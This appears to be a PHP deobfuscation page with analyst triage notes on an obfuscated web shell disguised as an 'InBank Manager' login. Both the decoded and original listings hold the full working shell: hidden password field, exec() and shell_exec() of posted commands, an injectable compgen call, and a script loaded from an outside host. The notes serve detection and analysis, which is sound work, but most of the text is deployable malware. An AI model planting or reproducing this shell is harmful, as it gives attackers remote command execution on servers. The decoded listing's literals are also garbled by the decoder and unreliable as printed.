
PHP Decode

<?php goto ZETTw; ZETTw: session_start(); goto AGkTr; mhp5n: function featureShell($cmd,..

Decoded Output

<?php 
/*
 * Analyst notes (triage of the decoded listing below).
 *
 * What it is: a password-gated web shell. Every statement is a labelled
 * fragment chained with goto, so the textual order is not the execution
 * order. Following the gotos, the script runs as:
 *   ZETTw  session_start()
 *   AGkTr  $valid_username = "admin"
 *   vd2qL  $hashed_password = bcrypt-format hash ($2y$, cost 12)
 *   FHise  login POST handler (password_verify against the hash)
 *   YotyF  ?logout -> session_destroy() and redirect to PHP_SELF
 *   umDdi  $authenticated read from $_SESSION["authenticated"]
 *   zUQyf  not authenticated -> print login page and die
 *   mhp5n / JQy_0 / dh6yB  define featureShell, featurePwd, featureHint
 *   BruoE  ?feature= dispatcher, replies with JSON and dies
 *   C2J4K  terminal-style HTML/JS panel
 *
 * Authentication: only the password matters. The username test compares the
 * literal "admin" with $valid_username (also "admin"), so it is always true;
 * the form posts no "username" field, and the $login_error branch is empty.
 * The password input is styled with opacity 0, so the rendered login page
 * shows only the "InBank Manager" heading and a Login button.
 *
 * Capability once authenticated: featureShell() hands the posted "cmd" to
 * exec() after chdir() to the posted "cwd"; featureHint() interpolates the
 * posted "filename" into a bash compgen command run through shell_exec().
 * Both run with the privileges of the PHP process.
 *
 * Detection pointers drawn from this listing:
 *   - POST requests to a single PHP file with query string feature=shell,
 *     feature=pwd or feature=hint and body fields cmd, cwd, filename, type;
 *     responses are application/json with keys stdout, cwd, files.
 *   - Page titles "Login" / "manager", heading "InBank Manager", prompt
 *     text "inBank@manager:".
 *   - The panel loads http://www.r57.gen.tr/yazciz/ciz.js over plain HTTP.
 *     The script body is not shown here, so its purpose is unconfirmed;
 *     treat outbound requests for it as an indicator.
 *   - Web-server processes spawning /bin/bash -c "compgen ..." children.
 *
 * Decoder artifact: escaped quotes and newlines inside string literals were
 * expanded to raw characters, so the featureHint() strings and the JS join()
 * arguments below are not valid as printed. Use the "Original Code" section
 * for exact literals.
 */
 goto ZETTw; ZETTw: session_start(); goto AGkTr; mhp5n: function featureShell($cmd, $cwd) { $stdout = array(); if (preg_match("/^\s*cd\s*$/", $cmd)) { } elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) { chdir($cwd); preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); chdir($match[1]); } else { chdir($cwd); exec($cmd, $stdout); } return array("stdout" => $stdout, "cwd" => getcwd()); } goto JQy_0; vd2qL: $hashed_password = "$2y$12$8wIxTUw3VYsFN4I6C6NqCe86hJwrmF6PdVZQbPP3r3x5g6rHe89Y6"; goto FHise; dh6yB: function featureHint($fileName, $cwd, $type) { chdir($cwd); if ($type == "cmd") { $cmd = "compgen -c {$fileName}"; } else { $cmd = "compgen -f {$fileName}"; } $cmd = "/bin/bash -c "{$cmd}""; $files = explode("
", shell_exec($cmd)); return array("files" => $files); } goto BruoE; umDdi: $authenticated = isset($_SESSION["authenticated"]) && $_SESSION["authenticated"] === true; goto zUQyf; BruoE: if (isset($_GET["feature"])) { $response = NULL; switch ($_GET["feature"]) { case "shell": $cmd = $_POST["cmd"]; if (!preg_match("/2>/", $cmd)) { $cmd .= " 2>&1"; } $response = featureShell($cmd, $_POST["cwd"]); break; case "pwd": $response = featurePwd(); break; case "hint": $response = featureHint($_POST["filename"], $_POST["cwd"], $_POST["type"]); } header("Content-Type: application/json"); echo json_encode($response); die; } goto C2J4K; YotyF: if (isset($_GET["logout"])) { session_destroy(); header("Location: " . $_SERVER["PHP_SELF"]); die; } goto umDdi; JQy_0: function featurePwd() { return array("cwd" => getcwd()); } goto dh6yB; zUQyf: if (!$authenticated) { ?> 
<!doctypehtml><html><head><meta charset="UTF-8"><title>Login</title><style>body{font-family:Arial,sans-serif;background-color:#333;color:#eee;display:flex;justify-content:center;align-items:center;height:100vh;margin:0}.login-form{background:#222;padding:20px;border-radius:5px;box-shadow:0 0 10px rgba(0,0,0,.5)}.login-form h2{margin-top:0}.login-form input{width:100%;padding:10px;margin:10px 0;border:none;border-radius:3px}.login-form button{width:100%;padding:10px;background:#75df0b;border:none;border-radius:3px;color:#fff;font-size:16px;cursor:pointer}.login-form button:hover{background:#5cb300}.error{color:#f44;margin-bottom:10px}</style></head><body><div class="login-form"><h2>InBank Manager</h2><?php  if (isset($login_error)) { } ?> 
<form method="POST"><input name="password"onblur="this.style.opacity=0"onfocus="this.style.opacity=0"placeholder=""style="width:100%;padding:12px;font-size:1rem;background-color:#220f0f;border:1px solid transparent;border-radius:4px;color:#333;opacity:0;cursor:pointer;transition:opacity .3s ease"type="password"> <button name="login"type="submit">Login</button></form></div></body></html><?php  die; } goto mhp5n; FHise: if (isset($_POST["login"])) { $username = $_POST["username"]; $password = $_POST["password"]; if ("admin" === $valid_username && password_verify($password, $hashed_password)) { $_SESSION["authenticated"] = true; $_SESSION["username"] = $username; } else { $login_error = "Wrong password"; } } goto YotyF; AGkTr: $valid_username = "admin"; goto vd2qL; C2J4K: ?> 
<!doctypehtml><script src="http://www.r57.gen.tr/yazciz/ciz.js"></script><html><head><meta charset="UTF-8"><title>manager</title><meta content="width=device-width,initial-scale=1"name="viewport"><style>body,html{margin:0;padding:0;background:#333;color:#eee;font-family:monospace}#shell{background:#222;max-width:800px;margin:50px auto 0 auto;box-shadow:0 0 5px rgba(0,0,0,.3);font-size:10pt;display:flex;flex-direction:column;align-items:stretch}#shell-content{height:500px;overflow:auto;padding:5px;white-space:pre-wrap;flex-grow:1}#shell-logo{font-weight:700;color:#ff4180;text-align:center}@media (max-width:991px){#shell-logo{display:none}#shell,body,html{height:100%;width:100%;max-width:none}#shell{margin-top:0}}@media (max-width:767px){#shell-input{flex-direction:column}}.shell-prompt{font-weight:700;color:#75df0b}.shell-prompt>span{color:#1bc9e7}#shell-input{display:flex;box-shadow:0 -1px 0 rgba(0,0,0,.3);border-top:rgba(255,255,255,.05) solid 1px}#shell-input>label{flex-grow:0;display:block;padding:0 5px;height:30px;line-height:30px}#shell-input #shell-cmd{height:30px;line-height:30px;border:none;background:0 0;color:#eee;font-family:monospace;font-size:10pt;width:100%;align-self:center}#shell-input div{flex-grow:1;align-items:stretch}#shell-input input{outline:0}#logout-btn{background:#f44;color:#fff;border:none;padding:5px 10px;cursor:pointer;margin-left:10px}#logout-btn:hover{background:#c00}</style><script>var CWD=null,commandHistory=[],historyPosition=0,eShellCmdInput=null,eShellContent=null;function _insertCommand(e){eShellContent.innerHTML+="

",eShellContent.innerHTML+='<span class="shell-prompt">'+genPrompt(CWD)+"</span> ",eShellContent.innerHTML+=escapeHtml(e),eShellContent.innerHTML+="
",eShellContent.scrollTop=eShellContent.scrollHeight}function _insertStdout(e){eShellContent.innerHTML+=escapeHtml(e),eShellContent.scrollTop=eShellContent.scrollHeight}function featureShell(e){_insertCommand(e),makeRequest("?feature=shell",{cmd:e,cwd:CWD},function(e){_insertStdout(e.stdout.join("
")),updateCwd(e.cwd)})}function featureHint(){if(0!==eShellCmdInput.value.trim().length){var e=eShellCmdInput.value.split(" "),n=1===e.length?"cmd":"file";makeRequest("?feature=hint",{filename:"cmd"==n?e[0]:e[e.length-1],cwd:CWD,type:n},function(e){if(!(e.files.length<=1))if(2===e.files.length)if("cmd"==n)eShellCmdInput.value=e.files[0];else{var t=eShellCmdInput.value;eShellCmdInput.value=t.replace(/([^\s]*)$/,e.files[0])}else _insertCommand(eShellCmdInput.value),_insertStdout(e.files.join("
"))})}}function genPrompt(e){var t=e=e||"~";if(3<e.split("/").length){var n=e.split("/");t="/"+n[n.length-2]+"/"+n[n.length-1]}return'inBank@manager:<span title="'+e+'">'+t+"</span>#"}function updateCwd(e){if(e)return CWD=e,void _updatePrompt();makeRequest("?feature=pwd",{},function(e){CWD=e.cwd,_updatePrompt()})}function escapeHtml(e){return e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;")}function _updatePrompt(){document.getElementById("shell-prompt").innerHTML=genPrompt(CWD)}function _onShellCmdKeyDown(e){switch(e.key){case"Enter":featureShell(eShellCmdInput.value),insertToHistory(eShellCmdInput.value),eShellCmdInput.value="";break;case"ArrowUp":0<historyPosition&&(historyPosition--,eShellCmdInput.blur(),eShellCmdInput.focus(),eShellCmdInput.value=commandHistory[historyPosition]);break;case"ArrowDown":if(historyPosition>=commandHistory.length)break;++historyPosition===commandHistory.length?eShellCmdInput.value="":(eShellCmdInput.blur(),eShellCmdInput.focus(),eShellCmdInput.value=commandHistory[historyPosition]);break;case"Tab":e.preventDefault(),featureHint()}}function insertToHistory(e){commandHistory.push(e),historyPosition=commandHistory.length}function makeRequest(e,n,t){var l=new XMLHttpRequest;l.open("POST",e,!0),l.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),l.onreadystatechange=function(){if(4===l.readyState&&200===l.status)try{var e=JSON.parse(l.responseText);t(e)}catch(e){alert("Error while parsing response: "+e)}},l.send(function(){var e=[];for(var t in n)n.hasOwnProperty(t)&&e.push(encodeURIComponent(t)+"="+encodeURIComponent(n[t]));return e.join("&")}())}window.onload=function(){eShellCmdInput=document.getElementById("shell-cmd"),eShellContent=document.getElementById("shell-content"),updateCwd(),eShellCmdInput.focus()}</script></head><body><div id="shell"><pre id="shell-content"> 
                <div id="shell-logo"> 
                                                                 <span></span> 
  ___ ___  _ __  ___  ___ | | ___   _ __ ___   __ _ _ __   __ _  __ _  ___ _ __ <span></span> 
 / __/ _ \| '_ \/ __|/ _ \| |/ _ \ | '_ ` _ \ / _` | '_ \ / _` |/ _` |/ _ \ '__|<span></span> 
| (_| (_) | | | \__ \ (_) | |  __/ | | | | | | (_| | | | | (_| | (_| |  __/ |   <span></span> 
 \___\___/|_| |_|___/\___/|_|\___| |_| |_| |_|\__,_|_| |_|\__,_|\__, |\___|_|   <span></span> 
                                                                |___/           <span></span> 
 
                </div> 
            </pre><div id="shell-input"><label class="shell-prompt"for="shell-cmd"id="shell-prompt">???</label><div><input name="cmd"id="shell-cmd"onkeydown="_onShellCmdKeyDown(event)"></div><button id="logout-btn"onclick='window.location.href="?logout=1"'>Logout</button></div></div></body></html>


Original Code

<?php
/*
 * Analyst notes on the obfuscation layer (original sample as submitted).
 * - String literals are double-quoted and written as mixed octal (\143) and
 *   hex (\x6d) escapes, which PHP expands at parse time; no eval() or
 *   decoding call is involved, consistent with "Eval Count 0" in the
 *   page's Stats.
 * - Statements are split into labelled fragments and reordered with goto, so
 *   top-to-bottom reading does not follow execution order.
 * - Function names (exec, shell_exec, chdir, password_verify), superglobals
 *   and the HTML/JS panel are left in clear text, so plain string matching on
 *   those still works; matching on the escaped literals requires expanding
 *   the escapes first.
 * - The MD5 listed under Stats identifies this exact file only; a
 *   re-obfuscated copy will hash differently.
 */
 goto ZETTw; ZETTw: session_start(); goto AGkTr; mhp5n: function featureShell($cmd, $cwd) { $stdout = array(); if (preg_match("\57\x5e\134\163\52\x63\144\134\x73\x2a\44\x2f", $cmd)) { } elseif (preg_match("\57\x5e\134\x73\52\143\x64\134\163\x2b\x28\56\x2b\51\x5c\163\x2a\x28\62\x3e\46\61\x29\x3f\44\57", $cmd)) { chdir($cwd); preg_match("\x2f\136\x5c\x73\52\143\144\134\x73\x2b\x28\133\x5e\x5c\x73\x5d\x2b\x29\134\163\x2a\x28\x32\x3e\x26\61\51\77\44\57", $cmd, $match); chdir($match[1]); } else { chdir($cwd); exec($cmd, $stdout); } return array("\x73\x74\x64\157\x75\x74" => $stdout, "\x63\x77\144" => getcwd()); } goto JQy_0; vd2qL: $hashed_password = "\44\x32\171\44\x31\x32\x24\70\x77\111\170\x54\x55\167\x33\126\x59\163\x46\116\64\111\66\x43\66\116\x71\103\145\70\x36\150\x4a\167\x72\155\106\66\x50\x64\126\132\121\142\x50\x50\63\x72\x33\x78\x35\147\66\162\x48\x65\70\x39\x59\66"; goto FHise; dh6yB: function featureHint($fileName, $cwd, $type) { chdir($cwd); if ($type == "\143\x6d\x64") { $cmd = "\143\157\155\160\147\x65\x6e\x20\x2d\143\x20{$fileName}"; } else { $cmd = "\143\x6f\x6d\160\x67\x65\156\40\55\x66\x20{$fileName}"; } $cmd = "\57\142\151\156\x2f\x62\x61\x73\x68\40\55\x63\x20\42{$cmd}\x22"; $files = explode("\12", shell_exec($cmd)); return array("\x66\x69\154\x65\163" => $files); } goto BruoE; umDdi: $authenticated = isset($_SESSION["\x61\165\x74\x68\x65\x6e\164\x69\143\141\x74\x65\x64"]) && $_SESSION["\141\x75\164\x68\x65\x6e\164\151\x63\x61\x74\145\x64"] === true; goto zUQyf; BruoE: if (isset($_GET["\146\x65\x61\164\x75\x72\x65"])) { $response = NULL; switch ($_GET["\146\x65\x61\x74\165\x72\145"]) { case "\163\x68\x65\154\x6c": $cmd = $_POST["\143\155\x64"]; if (!preg_match("\57\62\76\57", $cmd)) { $cmd .= "\x20\62\76\46\61"; } $response = featureShell($cmd, $_POST["\143\167\x64"]); break; case "\x70\167\x64": $response = featurePwd(); break; case "\150\x69\156\x74": $response = featureHint($_POST["\x66\151\x6c\x65\156\x61\155\145"], $_POST["\x63\x77\x64"], 
$_POST["\164\x79\x70\145"]); } header("\103\157\156\x74\145\156\164\x2d\124\x79\x70\x65\72\x20\x61\160\160\x6c\151\143\x61\x74\x69\x6f\x6e\57\x6a\163\157\156"); echo json_encode($response); die; } goto C2J4K; YotyF: if (isset($_GET["\154\157\x67\x6f\165\164"])) { session_destroy(); header("\x4c\157\x63\x61\164\x69\x6f\x6e\x3a\x20" . $_SERVER["\120\110\120\x5f\123\x45\114\106"]); die; } goto umDdi; JQy_0: function featurePwd() { return array("\143\167\144" => getcwd()); } goto dh6yB; zUQyf: if (!$authenticated) { ?>
<!doctypehtml><html><head><meta charset="UTF-8"><title>Login</title><style>body{font-family:Arial,sans-serif;background-color:#333;color:#eee;display:flex;justify-content:center;align-items:center;height:100vh;margin:0}.login-form{background:#222;padding:20px;border-radius:5px;box-shadow:0 0 10px rgba(0,0,0,.5)}.login-form h2{margin-top:0}.login-form input{width:100%;padding:10px;margin:10px 0;border:none;border-radius:3px}.login-form button{width:100%;padding:10px;background:#75df0b;border:none;border-radius:3px;color:#fff;font-size:16px;cursor:pointer}.login-form button:hover{background:#5cb300}.error{color:#f44;margin-bottom:10px}</style></head><body><div class="login-form"><h2>InBank Manager</h2><?php  if (isset($login_error)) { } ?>
<form method="POST"><input name="password"onblur="this.style.opacity=0"onfocus="this.style.opacity=0"placeholder=""style="width:100%;padding:12px;font-size:1rem;background-color:#220f0f;border:1px solid transparent;border-radius:4px;color:#333;opacity:0;cursor:pointer;transition:opacity .3s ease"type="password"> <button name="login"type="submit">Login</button></form></div></body></html><?php  die; } goto mhp5n; FHise: if (isset($_POST["\x6c\x6f\x67\151\x6e"])) { $username = $_POST["\x75\163\145\162\156\141\155\145"]; $password = $_POST["\x70\x61\163\163\x77\157\x72\144"]; if ("\141\x64\155\x69\156" === $valid_username && password_verify($password, $hashed_password)) { $_SESSION["\x61\165\x74\x68\145\156\164\151\x63\x61\164\x65\144"] = true; $_SESSION["\x75\x73\145\x72\x6e\141\x6d\145"] = $username; } else { $login_error = "\127\x72\x6f\156\147\x20\160\141\163\163\167\x6f\x72\x64"; } } goto YotyF; AGkTr: $valid_username = "\141\144\155\x69\156"; goto vd2qL; C2J4K: ?>
<!doctypehtml><script src="http://www.r57.gen.tr/yazciz/ciz.js"></script><html><head><meta charset="UTF-8"><title>manager</title><meta content="width=device-width,initial-scale=1"name="viewport"><style>body,html{margin:0;padding:0;background:#333;color:#eee;font-family:monospace}#shell{background:#222;max-width:800px;margin:50px auto 0 auto;box-shadow:0 0 5px rgba(0,0,0,.3);font-size:10pt;display:flex;flex-direction:column;align-items:stretch}#shell-content{height:500px;overflow:auto;padding:5px;white-space:pre-wrap;flex-grow:1}#shell-logo{font-weight:700;color:#ff4180;text-align:center}@media (max-width:991px){#shell-logo{display:none}#shell,body,html{height:100%;width:100%;max-width:none}#shell{margin-top:0}}@media (max-width:767px){#shell-input{flex-direction:column}}.shell-prompt{font-weight:700;color:#75df0b}.shell-prompt>span{color:#1bc9e7}#shell-input{display:flex;box-shadow:0 -1px 0 rgba(0,0,0,.3);border-top:rgba(255,255,255,.05) solid 1px}#shell-input>label{flex-grow:0;display:block;padding:0 5px;height:30px;line-height:30px}#shell-input #shell-cmd{height:30px;line-height:30px;border:none;background:0 0;color:#eee;font-family:monospace;font-size:10pt;width:100%;align-self:center}#shell-input div{flex-grow:1;align-items:stretch}#shell-input input{outline:0}#logout-btn{background:#f44;color:#fff;border:none;padding:5px 10px;cursor:pointer;margin-left:10px}#logout-btn:hover{background:#c00}</style><script>var CWD=null,commandHistory=[],historyPosition=0,eShellCmdInput=null,eShellContent=null;function _insertCommand(e){eShellContent.innerHTML+="\n\n",eShellContent.innerHTML+='<span class="shell-prompt">'+genPrompt(CWD)+"</span> ",eShellContent.innerHTML+=escapeHtml(e),eShellContent.innerHTML+="\n",eShellContent.scrollTop=eShellContent.scrollHeight}function _insertStdout(e){eShellContent.innerHTML+=escapeHtml(e),eShellContent.scrollTop=eShellContent.scrollHeight}function 
featureShell(e){_insertCommand(e),makeRequest("?feature=shell",{cmd:e,cwd:CWD},function(e){_insertStdout(e.stdout.join("\n")),updateCwd(e.cwd)})}function featureHint(){if(0!==eShellCmdInput.value.trim().length){var e=eShellCmdInput.value.split(" "),n=1===e.length?"cmd":"file";makeRequest("?feature=hint",{filename:"cmd"==n?e[0]:e[e.length-1],cwd:CWD,type:n},function(e){if(!(e.files.length<=1))if(2===e.files.length)if("cmd"==n)eShellCmdInput.value=e.files[0];else{var t=eShellCmdInput.value;eShellCmdInput.value=t.replace(/([^\s]*)$/,e.files[0])}else _insertCommand(eShellCmdInput.value),_insertStdout(e.files.join("\n"))})}}function genPrompt(e){var t=e=e||"~";if(3<e.split("/").length){var n=e.split("/");t="/"+n[n.length-2]+"/"+n[n.length-1]}return'inBank@manager:<span title="'+e+'">'+t+"</span>#"}function updateCwd(e){if(e)return CWD=e,void _updatePrompt();makeRequest("?feature=pwd",{},function(e){CWD=e.cwd,_updatePrompt()})}function escapeHtml(e){return e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;")}function _updatePrompt(){document.getElementById("shell-prompt").innerHTML=genPrompt(CWD)}function _onShellCmdKeyDown(e){switch(e.key){case"Enter":featureShell(eShellCmdInput.value),insertToHistory(eShellCmdInput.value),eShellCmdInput.value="";break;case"ArrowUp":0<historyPosition&&(historyPosition--,eShellCmdInput.blur(),eShellCmdInput.focus(),eShellCmdInput.value=commandHistory[historyPosition]);break;case"ArrowDown":if(historyPosition>=commandHistory.length)break;++historyPosition===commandHistory.length?eShellCmdInput.value="":(eShellCmdInput.blur(),eShellCmdInput.focus(),eShellCmdInput.value=commandHistory[historyPosition]);break;case"Tab":e.preventDefault(),featureHint()}}function insertToHistory(e){commandHistory.push(e),historyPosition=commandHistory.length}function makeRequest(e,n,t){var l=new 
XMLHttpRequest;l.open("POST",e,!0),l.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),l.onreadystatechange=function(){if(4===l.readyState&&200===l.status)try{var e=JSON.parse(l.responseText);t(e)}catch(e){alert("Error while parsing response: "+e)}},l.send(function(){var e=[];for(var t in n)n.hasOwnProperty(t)&&e.push(encodeURIComponent(t)+"="+encodeURIComponent(n[t]));return e.join("&")}())}window.onload=function(){eShellCmdInput=document.getElementById("shell-cmd"),eShellContent=document.getElementById("shell-content"),updateCwd(),eShellCmdInput.focus()}</script></head><body><div id="shell"><pre id="shell-content">
                <div id="shell-logo">
                                                                 <span></span>
  ___ ___  _ __  ___  ___ | | ___   _ __ ___   __ _ _ __   __ _  __ _  ___ _ __ <span></span>
 / __/ _ \| '_ \/ __|/ _ \| |/ _ \ | '_ ` _ \ / _` | '_ \ / _` |/ _` |/ _ \ '__|<span></span>
| (_| (_) | | | \__ \ (_) | |  __/ | | | | | | (_| | | | | (_| | (_| |  __/ |   <span></span>
 \___\___/|_| |_|___/\___/|_|\___| |_| |_| |_|\__,_|_| |_|\__,_|\__, |\___|_|   <span></span>
                                                                |___/           <span></span>

                </div>
            </pre><div id="shell-input"><label class="shell-prompt"for="shell-cmd"id="shell-prompt">???</label><div><input name="cmd"id="shell-cmd"onkeydown="_onShellCmdKeyDown(event)"></div><button id="logout-btn"onclick='window.location.href="?logout=1"'>Logout</button></div></div></body></html>

Function Calls

None

Variables

None

Stats

MD5 c997996d747d5d95d81e16d3be031f13
Eval Count 0
Decode Time 48 ms